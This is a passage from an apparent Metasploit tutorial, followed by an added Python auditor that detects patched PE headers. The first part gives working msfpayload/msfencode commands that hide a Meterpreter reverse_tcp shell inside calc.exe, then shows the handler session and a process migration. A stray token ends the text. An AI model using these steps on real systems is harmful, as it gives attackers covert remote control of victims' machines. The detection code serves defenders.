an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
Let's see the new msfencode options:
Usage: ./msfencode
OPTIONS:
-a
-b
-c
-e
-h Help banner
-i
-k Keep template work; run payload in new thread (use -x)
-l List available encoders
-m
-n Dump encoder information
-o
-p
-s
-t
-x
Let's make our new backdoored executable:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 \
R | ./msfencode -t exe -x calc.exe -k -o calc-back.exe \
-e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iter=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iter=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iter=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iter=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iter=5)
Get the backdoored exe on the other box and execute it.
We have a functional calc.exe and our shell. =)
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from
the backdoored executable process because if they close
the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc-back.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
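From the defender's side, a binary patched the way calc-back.exe was built above tends to leave structural traces in the PE header: the entry point no longer lands in the first executable section, and/or an extra section is mapped both writable and executable. The following is an added example, not code from the original post and not Metasploit's code; it is a small header-level auditor that flags those generic PE anomalies. The CLEAN_LAYOUT and PATCHED_LAYOUT section tables are constructed for the demo and are assumptions about what such a layout can look like, not dumps of a real calc.exe or a claim about exactly how msfencode rewrites its template.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics (40 bytes).
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")


def parse_pe(data: bytes) -> dict:
    """Read the entry point RVA and the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    optional = coff + 20
    entry = struct.unpack_from("<I", data, optional + 16)[0]  # AddressOfEntryPoint
    table = optional + size_of_optional
    sections = []
    for i in range(num_sections):
        f = SECTION_HEADER.unpack_from(data, table + i * SECTION_HEADER.size)
        sections.append({
            "name": f[0].rstrip(b"\0").decode("ascii", "replace"),
            "va": f[2],
            "span": max(f[1], f[3]),  # cover both VirtualSize and SizeOfRawData
            "chars": f[9],
        })
    return {"entry": entry, "sections": sections}


def audit_pe(data: bytes) -> list:
    """Return human-readable findings for layout anomalies typical of a patched PE."""
    pe = parse_pe(data)
    entry, sections = pe["entry"], pe["sections"]
    findings = []

    home = next((s for s in sections if s["va"] <= entry < s["va"] + s["span"]), None)
    executable = [s for s in sections if s["chars"] & IMAGE_SCN_MEM_EXECUTE]
    if home is None:
        findings.append(f"entry point 0x{entry:x} lies outside every section")
    elif not home["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point 0x{entry:x} is in non-executable section '{home['name']}'")
    elif executable and home is not executable[0]:
        findings.append(
            f"entry point 0x{entry:x} is in '{home['name']}', "
            f"not the first executable section '{executable[0]['name']}'")

    # Writable + executable sections are rare in compiler output and worth a look.
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section '{s['name']}' is both writable and executable")
    return findings


def build_sample_pe(layout, entry: int) -> bytes:
    """Construct a minimal PE header (not a runnable program) for testing the auditor.

    layout is a list of (name, virtual_address, size, characteristics) tuples."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0102)
    optional = bytearray(224)                              # PE32 optional header
    struct.pack_into("<H", optional, 0, 0x10B)             # Magic = PE32
    struct.pack_into("<I", optional, 16, entry)            # AddressOfEntryPoint
    table = b"".join(
        SECTION_HEADER.pack(name, size, va, size, 0x400 + i * 0x200, 0, 0, 0, 0, chars)
        for i, (name, va, size, chars) in enumerate(layout))
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + table


# Constructed layouts (assumptions for the demo, not dumps of real binaries).
CLEAN_LAYOUT = [
    (b".text", 0x1000, 0x3000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x4000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rsrc", 0x5000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]
# Same image with an appended RWX section that now owns the entry point.
PATCHED_LAYOUT = CLEAN_LAYOUT + [
    (b".inj", 0x6000, 0x1000,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]

if __name__ == "__main__":
    for label, layout, entry in (("clean", CLEAN_LAYOUT, 0x1200), ("patched", PATCHED_LAYOUT, 0x6010)):
        print(label, audit_pe(build_sample_pe(layout, entry)) or ["no findings"])
```

To run it against a real file, replace the constructed layouts with `audit_pe(open(path, "rb").read())`. These are triage heuristics, not a verdict: packers and some linkers also produce odd entry points or RWX sections, so a hit means "compare against a known-good copy of the same binary", which is also the check that catches a template whose sections were patched in place rather than appended.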
biOos